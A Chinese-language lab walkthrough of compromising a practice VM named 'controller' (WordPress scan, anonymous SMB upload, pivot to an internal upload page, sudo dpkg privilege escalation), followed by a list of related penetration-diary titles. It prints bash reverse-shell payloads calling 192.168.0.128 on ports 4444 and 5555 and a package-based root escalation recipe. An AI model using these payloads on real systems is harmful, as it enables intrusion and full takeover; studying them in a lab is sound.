靶机渗透日记 controller
IP
端口
目录扫描
发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来
访问80端口
文档说明我们可以上传一个项目,并可以被运行
服务器还开放了 139,445 端口,访问 SMB 服务
可以匿名访问
上传 shell.txt
import commands commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1"')
监听本地4444端口成功反弹shell
发现用户 webserv 在本地8080端口运行了一个网站
使用 frp 将目标端口 8080 代理到本地的 6000 端口
目录扫描
发现存在 upload.php
发现可以直接上传 .php 文件,成功getshell后发现无法执行命令
使用 PHP7_UserFilter 进行绕过
检查用户拥有的文件
find / -user webservice 2>/dev/null
查看 website.py 文件
import socket import sys import osscan = '127.0.0.1' port = 80s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) check = s.connect_ex((scan,port)) if check == 0:os.system("echo 'website up'>> /opt/logs/log.txt") else:os.system("echo 'website down'>> /opt/logs/log.txt") s.close sys.exit(0)
替换payload
import socket import sys import osos.system('/bin/bash -c "bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"')
监听5555端口反弹shell
执行
sudo -l
利用 dpkg 提权
TF=$(mktemp -d) echo 'exec /bin/sh' > $TF/x.sh fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
sudo dpkg -i x_1.0_all.deb
靶机渗透日记 controller相关推荐
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- 【渗透测试】靶机渗透Vulnhub-bulldog
目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...
- 靶机渗透【bulldog】
文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...
- Bulldog靶机渗透
Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...
- 【VulnHub靶机渗透】一:BullDog2
在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...
- bulldog2 靶机渗透
bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...
最新文章
- 理解 Delphi 的类(十) - 深入方法[9] - 调用时的括号
- CentOS 下线,TencentOS Server 全新登陆带来最强支持
- 不依赖jstack的java 线程dump和死锁检查工具
- JUC与JVM并发编程学习笔记03
- 正则只能输入数字java_正则表达式限制输入字符,数字,汉字等
- 虚拟机XP系统突然变卡顿解决办法
- 基于Python飞机票销售系统 毕业设计-附源码141432
- 微信小程序章节自测--6-7-8-9-有解析
- (纪录片)光的故事 BBC Light Fantastic (2004)
- 如何产生多样的变化? 探究网络游戏Avatar的角色设计
- 有时候qq邮箱不显示图片
- 领域分类的问题_别人的问题领域
- 限制input 输入框只能输入纯数字/数字/中文/英文
- 第一次的医美体验,决定了客户的回头率
- action='store_true'
- 瞬渺光电代理THZ光谱仪成功客户
- PCB模块化设计24——DCDC电源模块PCB布局布线设计规范
- 刷脸时代,“中国式过马路”的终结
- 解密新华三云密码之S12516X-AF核心交换机一览众山小
- https://www.cnblogs.com/xinxin1994/p/5257472.html oracle 创建用户